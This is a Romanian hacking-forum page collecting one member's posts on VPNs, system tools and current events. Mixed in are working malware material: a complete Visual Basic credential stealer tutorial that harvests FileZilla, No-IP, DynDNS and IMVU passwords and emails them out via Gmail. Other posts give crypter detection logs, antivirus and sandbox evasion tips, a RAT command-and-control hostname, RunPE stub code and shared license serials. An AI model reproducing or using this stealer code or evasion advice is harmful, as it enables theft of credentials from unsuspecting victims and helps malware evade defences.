Jump to content

Usr6

Active Members
  • Posts

    1337
  • Joined

  • Last visited

  • Days Won

    89

Everything posted by Usr6

  1. Why are you writing this guide, Kyek? Recently, some unknown newcomers to our scene have posted propaganda to our forums, claiming to be hackers who can get into Apple's E-mail, claiming to work for Apple, or a multitude of other things. Some of these people I've been able to very pointedly disprove, but others.. well, it's anyone's guess as to whether they're telling the truth or not. Most likely, they're just pissed-off developers who spent 15 minutes on google digging up a little dirt, and want to scare everyone away. The problem is, two of these posters have been able to find the real names of two of our crackers, and because of this many crackers are running off screaming, claiming they'll never crack another app. This drives me nuts, because that's exactly what these people want. And so, I'm writing this guide to give tips on how to protect yourself in our scene, showing you how to make it near-impossibly hard for anyone to figure out who you are in real life. How this guide works There are always extra layers of security you can add, giving yourself more and more protections. So, I'll be describing things in terms of "levels". "Level 1" is the most basic stuff you can do, Level 2 is what you can do if you're not satisfied with the little bit of protection level 1 gives, Level 3 is what you can do to protect yourself even more, etc. Just keep going until you're comfortable Articol Complet Lectura placuta.
  2. RAT shiny001.no-ip.biz 122.163.217.200 Server FileAve.com - mysite4's files (e bun accepta .exe downlod direct ) the.earth.li
  3. https://cyberghostvpn.com/page/registration.php dupa ce faci contu https://cyberghostvpn.com/en/account/add-serial.html "cobiextra" "quale157" update: licentza 1luna: (nu functioneaza in paralel cu altele gratuite) http://cyberghostvpn.com/de/landing/pc-welt.html?proID=200 https://cyberghostvpn.com/en/product/download.html serviciile "server"+"dhcp" trebuie sa fie activate autostart trafic inclus: 10GB premium +1GB free /luna (premium valabil 1 an, free cat vrei tu) +2GB data safe 2 GB of data storage protected with uncrackable 256-AES encryption powered by STRATO HiDrive (valabil pe perioada activa a contului premium) -din cate stiu nu suporta port forwarding -nu se impaca cu mail spam -clientul e bazat pe openvpn -serverele sunt in germania/cehia/olanda -exclude list (siteuri la care te conectezi direct,fara vpn) speed test -varianta free server cehia
  4. Scop: Evolutia detectiei in timp 1 server pi conexiune locala : 127.0.0.1 TCP port 3460 1 crypter public (un pic personalizat) (Scantime+Runtime) primu scan: 6 sept 2010 -FUD 22 sept 2010 Detection rate: 3 on 16 (19%) (a-squared si ikarus au aceiasi baza de date) a-squared 22/09/2010 5.0.0.19 Trojan-Dropper.MSIL!IK BitDefender 22/09/2010 7.0.0.2555 Trojan.Generic.4733184 Ikarus T3 22/09/2010 1001084 Trojan-Dropper.MSIL 29 sept 2010 Detection rate: 7 on 16 (44%) Status: INFECTED a-squared 29/09/2010 5.0.0.19 Trojan-Dropper.MSIL!IK Avast 29/09/2010 5.0 Win32:Malware-gen AVG 29/09/2010 9.0.0.725 Dropper.Generic2.BACU Avira AntiVir 29/09/2010 7.6.0.59 TR/Dropper.Gen BitDefender 29/09/2010 7.0.0.2555 Trojan.Generic.4733184 Ikarus T3 29/09/2010 1001084 Trojan-Dropper.MSIL VBA32 29/09/2010 3.12.14.1 TrojanDropper.MSIL.Agent.kux 11 oct 2010 Detection rate: 8 on 16 (50%) Status: INFECTED a-squared 11/10/2010 5.0.0.20 Trojan-Dropper.MSIL!IK Avast 11/10/2010 5.0 Win32:Malware-gen AVG 11/10/2010 9.0.0.725 Dropper.Generic2.BACU Avira AntiVir 11/10/2010 7.6.0.59 TR/Dropper.Gen BitDefender 11/10/2010 7.0.0.2555 Trojan.Generic.4733184 F-PROT6 11/10/2010 4.6.1.107 W32/MSIL_Troj.C.gen!Eldorado Ikarus T3 11/10/2010 1001084 Trojan-Dropper.MSIL VBA32 11/10/2010 3.12.14.1 TrojanDropper.MSIL.Agent.kux kaspersky, nod, panda, Dr.Web, comodo ... inca nimic;) >1 luna , pt un crypter public, cred ca e destul de ok:) scan Test 2. criptare calc.exe Detection rate: 6 on 16 (38%) Status: INFECTED a-squared 11/10/2010 5.0.0.20 Trojan-Dropper.MSIL!IK Avira AntiVir 11/10/2010 7.6.0.59 TR/Dropper.Gen BitDefender 11/10/2010 7.0.0.2555 Trojan.Generic.4733184 F-PROT6 11/10/2010 4.6.1.107 W32/MSIL_Troj.C.gen!Eldorado Ikarus T3 11/10/2010 1001084 Trojan-Dropper.MSIL VBA32 11/10/2010 3.12.14.1 TrojanDropper.MSIL.Agent.kux scan test2 test 3: scan crypter:) Detection rate: 0 on 16 (0%) Status: CLEAN scan crypter // voi edita postul din cand in cand pentru a vedea reactia diferitilor antivirusi @begood a fost rulat doar pe pc meu, sta bine merci pe desktop,kaspersky (update la zi) nu are nimic impotriva lui, nici cand sta nici cand functioneaza ( conexiunea la 127.0.0.1:3460) @paul4games are 16 zile, a fost scanat de 3 ori, pe 6, 8,22 sept avand o conexiune locala, se exclude de la sine spreadu etc;)
  5. Open Visual Basic 2008: Click File > Click then New Project > Choose Windows Application > Choose name > Click Ok From the Toolbox drag: * Button1 = Build * TextBox1 * TextBox2 * Label1- Change text to: Gmail Username: * Label2- Change text to: Gmail Password: Now when you add all these, on top of code add: Imports System.IO Now under Public Class Form1 add following code, that would be strings: Dim stub, text1, text2 As String Const FileSplit = "@OriginalCoder/Cyberhackers.org@" Now lets move to source code part, double click Button1= Build Button and write: text1 = TextBox1.Text text2 = TextBox2.Text FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default) stub = Space(LOF(1)) FileGet(1, stub) FileClose(1) If File.Exists("Server.exe") Then My.Computer.FileSystem.DeleteFile("Server.exe") End If FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(1, stub & FileSplit & text1 & FileSplit & text2) FileClose(1) Wow the Builder is done! Now we need to make the stub! Now you got your builder and now lets move to Stub. * Run Visual Basic 2008 * In Tab click File > New Project * Windows Application > "Stub" > Click Ok From the Toolbox add: * Textbox2 - Gmail Username * Textbox3 - Gmail Password Now when you add all these, on top of code add: Imports System.IO Imports System.Net.Mail Imports Microsoft.Win32 Now under Public Class Form1 add following code, that would be strings: Dim options(), text1, text2 As String Dim filezillaPass as String = ShoitZilla() Dim NoipPass as String = IpRecord() Dim dyndnsPass as String = GoogleDns() Dim imvuPass as String = DoToVu Dim pidginPass as String = PidginRec() Dim result As Integer Const FileSplit = "@OriginalCoder/Cyberhackers.org@" Now double click Form1 and write following code: me.hide me.visible = false dim nl as string = vbnewline Dim MailSetup As New MailMessage MailSetup.Subject = My.Computer.Name & ":" MailSetup.To.Add(TextBox2.Text) MailSetup.From = New MailAddress(TextBox2.Text) MailSetup.Body = filezilapass & nl & noippass & nl & dyndnspass & nl _ & imvupass & nl & pidgin & nl & "Do not Share this Tutorial in Other Community's Please! If you want me to Keep posting Source Codes and Tutorials." Dim SMTP As New SmtpClient("smtp.gmail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New Net.NetworkCredential(TextBox2.Text, TextBox3.Text) SMTP.Send(MailSetup) And add All these Functions to the source code: FileZilla: Function ShoitZilla() As String On Error Resume Next Dim FilePath As String = Environ("APPDATA") & "\FileZilla\recentservers.xml" Dim FileBuffer As String = vbNull Dim NL As String = vbNewLine FileBuffer = My.Computer.FileSystem.OpenTextFileReader(FilePath).ReadToEnd() Dim str As String Dim Output As String = Nothing Dim TempData() As String TempData = FileBuffer.Split(vbCrLf) FileBuffer = Nothing For Each str In TempData If str.Contains("</Host>") Then str.Replace("<Host>", "").Replace("</Host>", "") Output = Output & "Host : " & str & NL End If If str.Contains("</User>") Then str.Replace("<User>", "").Replace("</User>", "") Output = Output & "Username : " & str & NL End If If str.Contains("</Pass>") Then str.Replace("<Pass>", "").Replace("</Pass>", "") Output = Output & "Password : " & str & NL & NL End If Next Output = Output.Replace("<User>", "").Replace("</User>", "").Replace("<Host>", "").Replace("</Host>", "").Replace("<Pass>", "").Replace("</Pass>", "") ShoitZilla = Output End Function No-Ip Public Function base64Decode(ByVal data As String) As String Try Dim encoder As New System.Text.UTF8Encoding() Dim utf8Decode As System.Text.Decoder = encoder.GetDecoder() Dim todecode_byte As Byte() = Convert.FromBase64String(Data) Dim charCount As Integer = utf8Decode.GetCharCount(todecode_byte, 0, todecode_byte.Length) Dim decoded_char As Char() = New Char(charCount - 1) {} utf8Decode.GetChars(todecode_byte, 0, todecode_byte.Length, decoded_char, 0) Dim result As String = New [String](decoded_char) Return result Catch e As Exception Throw New Exception("Error in base64Decode" & e.Message) End Try End Function Function IpRecord() As String IpRecord = Nothing Dim Username As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Username", Nothing) Dim Password As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Password", Nothing) Dim NL As String = vbNewLine IpRecord = "Username : " & Username & vbNewLine & "Password : " & base64Decode(Password) & vbNewLine End Function DynDNS: Public Function GoogleDns() As String On Error Resume Next GoogleDns = Nothing Dim sAppData As String Dim sPath As String Dim sLine As String Dim sUser As String = Nothing Dim sPassword As String = Nothing Dim i As Integer Dim sChars As String = Nothing Dim lPtr As Integer sAppData = Environ("ALLUSERSPROFILE") If Right(sAppData, 1) <> "\" Then sAppData = sAppData & "\" sPath = sAppData & "DynDNS\Updater\config.dyndns" 'UPGRADE_WARNING: Dir has a new behavior. Click for more: 'ms-help://MS.VSCC.v90/dv_commoner/local/redirect.htm?keyword="9B7D5ADD-D8FE-4819-A36C-6DEDAF088CC7"' If Dir(sPath) <> "" Then FileOpen(1, sPath, OpenMode.Binary) Do While Not EOF(1) sLine = vbNullString sLine = LineInput(1) If Left(sLine, 9) = "Username=" Then sUser = Mid(sLine, 10) If Left(sLine, 9) = "Password=" Then sPassword = Mid(sLine, 10) 'We have what we want, now exit do Exit Do End If Loop FileClose(1) For i = 1 To Len(sPassword) Step 2 sChars = sChars & Chr(Val("&H" & Mid(sPassword, i, 2))) Next i For i = 1 To Len(sChars) Mid(sChars, i, 1) = Chr((Asc(Mid(sChars, i, 1))) Xor (Asc(Mid("t6KzXhCh", lPtr + 1, 1)))) lPtr = ((lPtr + 1) Mod 8) Next i GoogleDns = "Username : " & sUser & vbNewLine & "Password : " & sChars & vbNewLine End If End Function IMVU: Function ReadKey(ByRef hKey As String) As Object ' // Function for Read REG Values On Error GoTo Error_Renamed ' // If Error dont Display Error Dim X As Object ' // X = CreateObject("WScript.shell") ' // Create REG Object ReadKey = X.regread(hKey) ' // Read The Key Exit Function Error_Renamed: ReadKey = vbNullString ' // If Error Readkey = "" End Function Public Function Hex2Ascii(ByVal Text As String) As String Dim Value As Object Dim num As Object Dim i As Object ' // Simple Function for Pass Hex to Ascii Value = Nothing For i = 1 To Len(Text) ' Len of Encripted Text num = Mid(Text, i, 2) ' // Go Chr by Chr Value = Value & Chr(Val("&h" & num)) ' // Pass from Hex i = i + 1 ' // +1 Next i ' Next Chr Hex2Ascii = Value ' // End Function Public Function DoToVu() As String Dim sUser, sPass As String ' // Some Variables sUser = "HKEY_CURRENT_USER\Software\IMVU\username\" ' // Username REG Path sPass = "HKEY_CURRENT_USER\Software\IMVU\password\" ' // Password REG Path DoToVu = "IMVU : " & vbNewLine & "Username : " & ReadKey(sUser) & vbNewLine & "Password : " & Hex2Ascii(ReadKey(sPass)) Exit Function Stub Done... credits: whitey187 @HH
  6. parca era cel mai cald din istorie Avertizare NASA: 2010, cel mai cald an din istorie nasa vs cercetatorii polenozi cine sa-i mai creada;) iarna bate-n usa, razboiu sta la poarta, petrolu se termina, papa nu mai e..., base-i cu barca, boc e cu vaca , om trai si om vedea, kk maka btw, cica tre sa ne viziteze si un cutremur, sa fie paharu plin:D
  7. ceva de genu? <button href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252Fuser%252Fagnetha4ever&hl=en_US&ltmpl=sso" type="button" class=" yt-uix-button yt-uix-button-urgent" onclick=";window.location.href=this.getAttribute('href');return false;">
  8. Firefox + skipscreen = http://blip.tv/play/AfW%2BNg skip: Rapidshare Megaupload Mediafire Uploaded.to zShare Sharebee DepositFiles Sendspace Divshare Linkbucks Link-protector More on the way..
  9. Usr6

    ssh moka

    din moment ce sunt care cer tutoriale pt un stealer..., pp ca nu toata lumea a folosit macar o data un tunel ssh, sau are habar cu ce se mananca dar, daca tu zici ca lumea e asa priceputa...
  10. Usr6

    ssh moka

    What commands and software are available? All shell accounts include access to the FreeBSD binaries and libraries, compilers, scripting languages (Perl/PHP/Python/Ruby/Tcl), editors (emacs/nano/pico/vi/vim), shells (bash/csh/sh/tcsh), Lynx, wget, and other utilities, along with more than 10,000 software packages to install in your home directory. What operating system do you use and what are the server specifications? Our shell server runs the FreeBSD 8.1 amd64 operating system on an Intel quad core 3 GHz processor with 16GB of RAM and 1TB of disk space. What restrictions apply to shell accounts on your server? Each account may use up to 1GB of disk space, store up to 100,000 files, and run up to 16 processes at the same time. Each process is restricted to 128MB of RAM and one hour of CPU time. There is a limit of two SSH connections per IP address. Are outgoing connections allowed? Are incoming connections allowed? Outgoing TCP connections are allowed and are proxied through the Tor network. All other outgoing traffic and all incoming traffic is prohibited by our firewall. Can I use my shell account to SSH forward/proxy/tunnel my Internet traffic? Yes, we allow TCP forwarding through SSH. Your traffic will exit through the Tor network. Can I run background processes or daemons? Can I setup a crontab or use screen? You may run background processes and daemons and leave them running after you log out, but we do not offer access to crontab or screen. Server daemons that listen for incoming connections will not work since incoming traffic is prohibited by our firewall. CJB.NET - Free Shell Account Host Name (For cjb.net shell account): shell.cjb.net Port :22 username: your cjb.net shell username password: your cjb.net shell password p.s. cine are timp liber poate face un tutorial de utilizare
  11. Usr6

    sugestii FUD

    maj crypterelor sunt fud doar la setarile "default" ale antivir -bazat pe semnaturi, heuristic minim eventual lipsa-daca cresti nivelu de analiza heuristica cam dispare FUD-ul;) alta buba e : default, maj antivir trimit fisierele suspecte la analiza aprofundata pe serverul lor, luat la puricat manual iar dispare fudu (iar o data descoperit de un antivir e chestiune de cateva zile pana il gasesc si restu) de aia e bine sa stii cu ce antivirus te confruntzi, testezi crypterul respectiv in conditi similare, eventual poti modifica /hosts sa blochezi anumite siteuri de scan(este un crypter celebru care face asta , nu dam nume)/updateurile etc. pt a evita rularea in masine virtuale fara a da de banuit ca ii vb de un virusache se poate face si asa: 1buc crypter cu optiunile de anti activate toate 1buc binder simplu se crypteaza virusache, se binduiesteste cu un progr oarecare si gata , eventual se adauga un delay mic la virusache ------- dar cum toti cauta FUD sa faca spread peste tot si fura orice nu conteaza numa sa aiba loguri la greu... (chiar daca nu fac nimica cu ele, dar sa fie acolo) nu e de mirare ca azi e fud, maine e UD, poimaine e 90%detected
  12. Usr6

    Hi All

    o fi antrax de pe indetectables & ash ?
  13. daca vrei sa vezi date ordonate frumos pe categorii etc, poti sa ti faci un cont la ei, urci arhiva in contul tau si vezi acolo datele aranjate
  14. Cercetatorii de la Universitatea din Michigan sunt la un pas de a realiza inteligenta artificiala: au creat microorganisme virtuale care sunt capabile sa se reproduca. Micutele fiinte virtuale se numesc "avidieni" si traiesc intr-un mediu generat de computer, controlat de cercetatorii din Michigan, relateaza The Telegraph. Acestea sunt capabile sa se reproduca, insa in loc sa copieze cod ADN, copiaza cod de computer. Codul nu este insa copiat perfect, asa ca apar erori care dicteaza noul comportament al avidienilor care se "nasc". Tot codul computerului este cel care controleaza cat de bine sau cat de rau se vor descurca in mediul virtual. Cercetatorii au efectuat si experimente cu avidienii, punandu-i sa traiasca intr-o retea de celule. Avidienii au fost pusi la un capat al retelei unde nu se afla mancare si au inceput sa se reproduca. Dupa o suta de generatii, o mutatie a facut ca avidienii sa se miste inspre capatul unde era mai multa hrana, unde s-au reprodus rapid si au avut mai multi "urmasi". Dupa mii de alte generatii, avidienii au reusit sa-si dezvolte chiar si o memorie rudimentara, miscandu-se catre hrana pe o traiectorie in zig-zag, schimband directia atunci cand greseau traseul. Pentru a face asta, trebuiau sa fie capabili sa deosebeasca o celula de alta. "Pentru a face asta, trebuie sa ai o inteligenta rudimentara. Trebuie sa si evaluezi situatia, sa iti dai seama ca nu mergi in directia care trebuie, sa te reorientezi si sa evaluezi din nou", explica Robert Pennock, unul dintre oamenii de stiinta care coordoneaza experimentele. Alte exeperimente au aratat ca memoria micutilor avidieni chiar functioneaza, acestia fiind capabili sa urmeze instructiuni si sa faca ceea ce au mai facut in alte celule. Cercetatorii sustin ca astfel se arata cum a evoluat inteligenta: capacitatea de a rezolva probleme simple de directie depinde in primul rand de memoria pe termen scurt, chiar si la fiintele artificiale. Specialistii vor acum sa creeze fiinte virtuale si mai complicate, care sa simuleze activitatea neuronilor intr-un creier artifical, pe baza unor ecuatii.sursa
  15. GetSystemInfo -varianta Kaspersky info: GetSystemInfo down: http://www.getsysteminfo.com/download/GetSystemInfo.exe *daca se uita vreun moderator aici il rog sa modifice titlul topicului in "ESET SysInspector + Kaspersky GetSystemInfo" //done
  16. ms:D am mai avansat un pic 8/18 am trecut de : ClamAV 29/07/2010 0.96.1 Comodo 29/07/2010 4.0 Dr.Web 29/07/2010 5.0 NOD32 29/07/2010 4.2.42.0 Panda 29/07/2010 10.0.3.0 QuickHeal 29/07/2010 11.0 Solo 29/07/2010 9.0 TrendMicro 29/07/2010 9.120-1004 VBA32 29/07/2010 3.12.12.2 VirusBuster 29/07/2010 1.5.6
  17. intrebare de noob:| in cazul meu cum ar veni aplicat, tot ce am incercat era gresit Sub Main() Dim file As String file = kk1 & kk2 & kk3 & kk4 Dim dat1 As String Open file For Binary As #1 dat1 = Space(LOF(1)) Get #1, , dat1 Close 1# Dim splitu() As String splitu() = Split(dat1, "separator") splitu(1) = Rc4(splitu(1), "parola") ' Dim ) As Byte ' Open Environ$("WINDIR") & "\SYSTEM32\calc.exe" For Binary As #1 ' ReDim X(0 To LOF(1) - 1) ' Get #1, , X ' Close #1 ' Call RunPE(X, Environ$("WINDIR") & "\SYSTEM32\notepad.exe") Call HRSCHXC(file, StrConv(Split(1), vbFromUnicode), vbNullString) End Sub Function kk1() As String kk1 = App.Path End Function Function kk2() As String kk2 = "\" End Function Function kk3() As String kk3 = App.EXEName End Function Function kk4() As String kk4 = StrReverse("exe.") End Function Public Function Rc4 ms anticipat
  18. cu placere, dupa ce ti scoti investitita +un oarecare profit acolo, sper sa faci cinste cu un stub functional+sursele lui
  19. *OFF a strans un an intreg alocatia sa cumpere un FlyC ..., e normal sa doreasca amortizarea investitiei *ON bv, totusi 2 euro e cam piperat pt romani, 1 euro/crypt cred ca era ok lasa si detalii daca vrei sa ai clienti, ca nu toti is dornici de asi umple lista de Y! pt a cere info asupra "produsului"(gen : ce garantie dai?) Ex: -garantie 1,2,3,4,5,6 luni -stub unic la fiecare client. -plata se face transfer credit pe tel(o/v/c)/paypal/etc -confidentialitate -etc
  20. Offline Update http://data2.kaspersky-labs.com:8080/updater/KLUpdater.zip
  21. nu necesita instalare Microsoft Windows 7 Microsoft Windows Vista Microsoft Windows XP Microsoft Windows 2000 Microsoft Windows Server 2008 (Server Core edition as well) Microsoft Windows Server 2003 x32 http://download.eset.com/download/sysinspector/32/ENU/SysInspector.exe x64 http://download.eset.com/download/sysinspector/64/ENU/SysInspector.exe
  22. Usr6

    Teoria haosului

    sunt aspecte cunoscute, un exemplu fictiv, pp ca exista unele reale mult mai dramatice: 1 familie: sotz sotie +copil profesori amandoi, salariu comun <2000 lei dupa scadere <1500 rate la banca pt apartament cam 800-1200 lei cheltuieli comune (apa/gaz/lumina/intretinere/tv/telefon/ etc )->minim 2-300 lei conform exemplelor de mai sus ar trebui sa aiba mai multi bani de investit. de unde? p.s. nu cred ca trebuie sa fi absolvent de harward pt a realiza ca marea majoritate se ma reorienta catre produsele din piatza fara factura (Ex: Calgon in piatza (made in ucraina) -5 lei, in supermarket vro 12-14 lei ) -daca nu se platesc facturi/taxe etc scad veniturile la stat, daca scad veniturile se scad pensiile/salariile bugetare/investitiile(alea oricum lipsesc) etc apare efectul bulgarelui de zapada -pt timp scurt vor scadea unele preturi pt a putea vinde marfa din stoc-chiar si in pierdere pt vanzator/odata vanduta respectiva va incerca sa aduca produse mai ieftine(calitate mai redusa , etc) in cel mai bun caz [la electronice de ex se poate traduce printr un randament mai slab: consum mai mare de energie, durata de functionare mai redusa etc --> in final un pret total mai mare pt o calitate mica] exemplele pot continua;) fara a da in teoria consiratiei .... Mare Maestru al Marii Loji Na?ionale din România +Clubul de la Berna
  23. */ ce frumos ploua afara:-"
  24. Usr6

    PI

    ===))))))) se referea sa gasiti pe site ul respectiv pagina unde sunt afisate 1.000.000 zecimale:) Pi to 1,000,000 places
×
×
  • Create New...